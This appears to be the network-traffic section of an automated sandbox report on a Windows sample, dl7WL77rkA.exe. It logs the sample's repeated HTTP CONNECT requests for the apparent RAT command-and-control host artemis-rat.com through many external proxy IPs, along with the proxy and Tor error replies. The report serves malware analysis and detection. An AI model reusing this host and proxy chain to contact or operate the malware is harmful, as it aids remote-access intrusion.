                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            965192.168.2.55260967.43.236.20256333876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.548007965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            966192.168.2.55255113.234.24.11631283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.553086042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.940310955 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:41 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            967192.168.2.552675162.240.22.184480263876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.568866968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            968192.168.2.55259572.206.181.105649353876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.573025942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            969192.168.2.552607174.77.111.198495473876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.586534023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            970192.168.2.550311171.244.140.160560763876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.586539030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.592586994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.592943907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            971192.168.2.55219669.61.200.104361813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.586622000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            972192.168.2.55267238.162.30.19731283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.589656115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.036452055 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            973192.168.2.55270223.95.209.142156733876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.589677095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            974192.168.2.552560201.243.82.15731283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.590959072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.514287949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.939320087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.121642113 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.299580097 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            975192.168.2.55259451.158.98.197163793876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.598263025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.404824018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.355422974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.108408928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.608460903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.217679024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.717684031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:02.791243076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:04.927840948 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:08.069421053 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:14.213310957 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:26.245313883 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:50.565409899 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:39.717700005 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
